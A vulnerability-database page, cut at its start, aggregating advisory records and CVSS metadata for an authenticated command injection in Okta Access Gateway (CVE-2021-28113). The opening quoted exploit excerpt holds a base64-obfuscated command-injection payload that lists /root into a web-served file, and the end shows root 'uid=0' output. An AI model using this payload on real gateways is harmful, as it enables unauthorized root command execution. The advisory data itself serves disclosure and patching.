payload\n\n$(echo${IFS}\u0027c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA==\u0027\u003etest;$(base64${IFS}-d${IFS}test))\n\n3) check https://gw-admin.domain.tld/auth/test.php for the output of the command\n\n===\nFix\n===\n\nThe cookie bug was a \"known issue\" and fixed in v2020.9.3 and the relay bug was also fixed and no longer works on the latest v2021.2.1. \n\nhttps://www.okta.com/security-advisories/cve-2021-28113/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28113"
      },
      {
        "db": "PACKETSTORM",
        "id": "163428"
      }
    ],
    "trust": 1.89
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-387508",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "163428",
        "trust": 2.7
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113",
        "trust": 2.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-387508",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28113",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28113"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "PACKETSTORM",
        "id": "163428"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ]
  },
  "id": "VAR-202104-1194",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:32:41.762000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Okta\u00a0security\u00a0advisories\u00a0(Okta\u00a0Access\u00a0Gateway\u00a0CVE-2021-28113)",
        "trust": 0.8,
        "url": "https://www.okta.com/security-advisories/cve-2021-28113/"
      },
      {
        "title": "Okta Access Gateway Fixes for operating system command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146880"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.1
      },
      {
        "problemtype": "OS Command injection (CWE-78) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://packetstormsecurity.com/files/163428/okta-access-gateway-2020.5.5-authenticated-remote-root.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.okta.com/security-advisories/cve-2021-28113"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28113"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://google.com\","
      },
      {
        "trust": 0.1,
        "url": "https://gw-admin.domain.tld/auth/test.php"
      },
      {
        "trust": 0.1,
        "url": "https://www.okta.com/security-advisories/cve-2021-28113/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28113"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "PACKETSTORM",
        "id": "163428"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28113"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "PACKETSTORM",
        "id": "163428"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-02T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "date": "2021-04-02T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28113"
      },
      {
        "date": "2021-12-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "date": "2021-07-07T16:10:02",
        "db": "PACKETSTORM",
        "id": "163428"
      },
      {
        "date": "2021-04-02T15:15:13.160000",
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "date": "2021-04-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-05-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "date": "2021-07-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-28113"
      },
      {
        "date": "2021-12-08T03:07:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "date": "2022-05-27T16:47:02.470000",
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "date": "2021-07-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Okta\u00a0Access\u00a0Gateway\u00a0 In \u00a0OS\u00a0 Command injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ],
    "trust": 0.6
  }
}

GHSA-J6W2-8WW3-QH9Q

Vulnerability from github – Published: 2022-05-24 17:46 – Updated: 2022-05-28 00:00

Details

Severity ?

6.7 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2021-28113"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-02T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account.",
  "id": "GHSA-j6w2-8ww3-qh9q",
  "modified": "2022-05-28T00:00:25Z",
  "published": "2022-05-24T17:46:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28113"
    },
    {
      "type": "WEB",
      "url": "https://www.okta.com/security-advisories/cve-2021-28113"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GSD-2021-28113

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Aliases

CVE-2021-28113

Aliases

CVE-2021-28113

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2021-28113",
    "description": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account.",
    "id": "GSD-2021-28113",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2021-28113"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-28113"
      ],
      "details": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account.",
      "id": "GSD-2021-28113",
      "modified": "2023-12-13T01:23:29.601080Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2021-28113",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AC:L/AV:N/A:L/C:H/I:H/PR:H/S:U/UI:N",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.okta.com/security-advisories/cve-2021-28113",
            "refsource": "CONFIRM",
            "url": "https://www.okta.com/security-advisories/cve-2021-28113"
          },
          {
            "name": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:okta:access_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2020.8.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-28113"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-78"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.okta.com/security-advisories/cve-2021-28113",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://www.okta.com/security-advisories/cve-2021-28113"
            },
            {
              "name": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 8.7,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 9.5,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
            "version": "3.1"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.5
        }
      },
      "lastModifiedDate": "2022-05-27T16:47Z",
      "publishedDate": "2021-04-02T15:15Z"
    }
  }
}

FKIE_CVE-2021-28113

Vulnerability from fkie_nvd - Published: 2021-04-02 15:15 - Updated: 2024-11-21 05:59

Severity ?

6.7 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
6.7 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.okta.com/security-advisories/cve-2021-28113	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.okta.com/security-advisories/cve-2021-28113	Vendor Advisory

Impacted products

	Vendor	Product	Version
	okta	access_gateway	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:okta:access_gateway:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "343753F5-E862-458C-A3F8-887579F836A9",
              "versionEndIncluding": "2020.8.4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de inyecci\u00f3n de comandos en los par\u00e1metros cookieDomain y relayDomain de Okta Access Gateway versiones anteriores a 2020.9.3, permite a atacantes (con acceso de administrador a la interfaz de usuario de Okta Access Gateway) ejecutar comandos del sistema operativo como una cuenta system privilegiada."
    }
  ],
  "id": "CVE-2021-28113",
  "lastModified": "2024-11-21T05:59:06.290",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 8.7,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 9.5,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.7,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.5,
        "source": "cve@mitre.org",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.7,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.5,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-02T15:15:13.160",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.okta.com/security-advisories/cve-2021-28113"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.okta.com/security-advisories/cve-2021-28113"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2021-28113 (GCVE-0-2021-28113)

VAR-202104-1194

1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ]

GHSA-J6W2-8WW3-QH9Q

GSD-2021-28113

FKIE_CVE-2021-28113

Tags

Sightings

Nomenclature